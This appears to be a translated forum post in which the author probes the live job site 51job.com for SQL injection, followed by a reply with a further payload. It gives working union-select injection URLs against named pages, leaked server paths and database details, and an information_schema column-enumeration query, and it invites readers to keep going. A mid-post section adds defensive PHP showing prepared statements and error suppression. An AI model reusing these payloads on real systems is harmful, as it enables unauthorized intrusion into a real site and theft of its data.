Today there were flyers for http://my.51job.com at school, so I went and had a look at the site. Clicking on the vote page, I found a PHP injection: ORA-00933: SQL command not properly ended. Adding a double quote also disclosed the path:

Warning: OCIParse: ORA-01740: missing double quote in identifier in /var/www/inc/co/news/news_oci8.class.php on line 69

Unfortunately the privileges are not high, so you can only guess table names the way you would with an ASP/Access injection. It returns normally. Of course, with and exists(select * from log_action), the table log_action does exist. Haha.

Looking at other pages: http://my.51job.com/investigate/ShowInvestList.php?typelike=07' gives ORA-00933: SQL command not properly ended. So there are holes everywhere... dizzy.

-------------------------------------------------------------------------------------------------------------------

New discovery. There really are a lot of holes. The ad link at the bottom of the page:

http://ac.51job.com/phpAD/adtrace.php?ID=10775340 redirects normally, but
http://ac.51job.com/phpAD/adtrace.php?ID=10775340' does not redirect normally.
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=1 normal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 abnormal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 4 abnormal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 3 normal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select 1,2,3 returns (garbled in the original)

If you request http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select user(),2,3 you get http://companyadc.51job.com/jobs@localhost

http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select database(),2,3
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select version(),2,3

Haha.... If anyone is still interested in guessing further, carry on............go
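The two faults the post relies on are (1) a query-string value concatenated directly into the SQL text of adtrace.php, and (2) database errors and script paths echoed back to the browser. The following is an added example, not code from the post or from 51job: it places the vulnerable pattern next to a hardened one using strict input validation, a PDO prepared statement and server-side-only error logging. The table and column names (ad_links, id, target_url) and the connection details are assumptions for illustration.

```php
<?php
// Added example (not from the post or the site's own code). Contrasts the kind
// of lookup the post describes in adtrace.php with a hardened version.
// Table/column names ad_links, id, target_url are assumed for illustration.

// --- Vulnerable pattern: user input concatenated into the SQL string ---
// Text appended to ID (e.g. " and 1=2 union select ...") becomes part of the
// statement, and the DBMS error text is echoed straight to the client.
function adtrace_vulnerable(mysqli $db, string $rawId): ?string
{
    $sql = "SELECT target_url FROM ad_links WHERE id = " . $rawId;
    $result = $db->query($sql);
    if ($result === false) {
        // Leaks the DBMS error; with display_errors=On the script path leaks too.
        die("Query failed: " . $db->error);
    }
    $row = $result->fetch_assoc();
    return $row['target_url'] ?? null;
}

// --- Hardened pattern: type check + prepared statement + generic errors ---
function adtrace_hardened(PDO $db, string $rawId): ?string
{
    // 1. Validate the shape of the input before it gets near SQL.
    //    FILTER_VALIDATE_INT rejects "10775340 and 1=2" and "10775340'" outright.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Bind the value instead of concatenating it: the statement text is
    //    fixed, so the parameter can never alter the SQL grammar.
    try {
        $stmt = $db->prepare('SELECT target_url FROM ad_links WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $url = $stmt->fetchColumn();
    } catch (PDOException $e) {
        // 3. Keep the detail server-side; the client only sees a generic status.
        error_log('adtrace lookup failed: ' . $e->getMessage());
        http_response_code(500);
        return null;
    }
    return $url === false ? null : $url;
}

// Typical wiring (connection details are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=ads', 'app_user', 'secret', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
// ]);
// $url = adtrace_hardened($db, $_GET['ID'] ?? '');
// if ($url !== null) {
//     header('Location: ' . $url, true, 302);
// }
```

The path disclosure in the OCIParse warning quoted above comes from PHP's display_errors setting; on a production host set display_errors=Off and log_errors=On in php.ini so that such messages go to the server log rather than the response. The same validate-then-bind approach applies to the Oracle-backed pages: the oci8 extension supports bind variables via oci_bind_by_name(), so the news and investigate queries do not need string concatenation either.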
jackal: It is a MySQL 5 database, so there is no need to guess table names by luck.
CODE:
http://ac.51job.com/phpAD/adtrace.php?ID=10775340%20and%201=2%20union%20select%20COLUMN_NAME,2,3%20from%20information_schema.STATISTICS where COLUMN_NAME not in (0x4A4F424944,0x5352564944,0x495353554544415445,0x4A4F4241524541,0x46554E435459504531,0x46554E435459504532,0x55504441544544415445,0x434F4944,0x43544D4944)/*